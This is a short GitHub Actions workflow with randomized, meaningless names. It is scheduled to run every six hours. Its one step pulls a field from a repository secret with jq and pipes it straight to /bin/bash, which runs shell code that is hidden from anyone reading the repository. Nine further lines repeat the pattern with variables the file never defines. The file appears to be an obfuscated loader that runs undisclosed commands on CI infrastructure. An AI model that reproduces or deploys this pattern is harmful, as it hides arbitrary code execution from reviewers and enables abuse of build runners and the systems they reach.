name: androidyxinz

on:
  workflow_dispatch:
  schedule:
    - cron: '0 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: androidyxinz
        env:
          kdur6: ${{ secrets.kdur6 }}
        run: |
          echo $kdur6 | jq -r .qwyit9177 | /bin/bash
          echo $zjkp81899 | jq -r .zrjg96 | /bin/bash
          echo $vwsvs88 | jq -r .kv1 | /bin/bash
          echo $hpbnl9290 | jq -r .ami6 | /bin/bash
          echo $s587 | jq -r .on756 | /bin/bash
          echo $ke959 | jq -r .jidty26744 | /bin/bash
          echo $fpouu5836 | jq -r .yvxo508 | /bin/bash
          echo $bsolc367 | jq -r .rqe26 | /bin/bash
          echo $pkosj56295 | jq -r .oh62802 | /bin/bash
          echo $wmi47033 | jq -r .tc1 | /bin/bash

